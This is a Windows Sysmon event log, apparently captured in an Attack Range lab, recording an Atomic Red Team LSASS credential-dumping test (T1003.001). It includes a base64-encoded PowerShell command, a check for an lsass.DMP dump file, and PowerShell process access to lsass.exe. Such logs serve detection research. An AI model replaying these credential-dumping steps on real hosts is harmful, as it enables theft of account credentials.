15:52:53.723{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004484Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.723{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004483Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.723{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004482Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.723{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004481Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.723{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CD5-5FA1-E000-000000008801}4612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004480Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.723{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD5-5FA1-E000-000000008801}4612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004479Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.731{D28789B6-7CD5-5FA1-E000-000000008801}4612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {cmd /c \""if not exist %%tmp%%\lsass.DMP (exit /b 1)\""} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004478Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.582{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD5-5FA1-DF00-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004477Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.582{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD5-5FA1-DF00-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004476Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.551{D28789B6-7CD5-5FA1-DF00-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3q3kvzuo.kwg.ps12020-11-03 15:52:53.551 10341000x80000000000000004475Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.535{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CD5-5FA1-DF00-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004474Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD5-5FA1-DF00-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004473Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD5-5FA1-DF00-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004472Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004471Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004470Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004469Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004468Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004467Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004466Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004465Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004464Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004463Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CD5-5FA1-DF00-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004462Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:53.504{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD5-5FA1-DF00-000000008801}2320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.3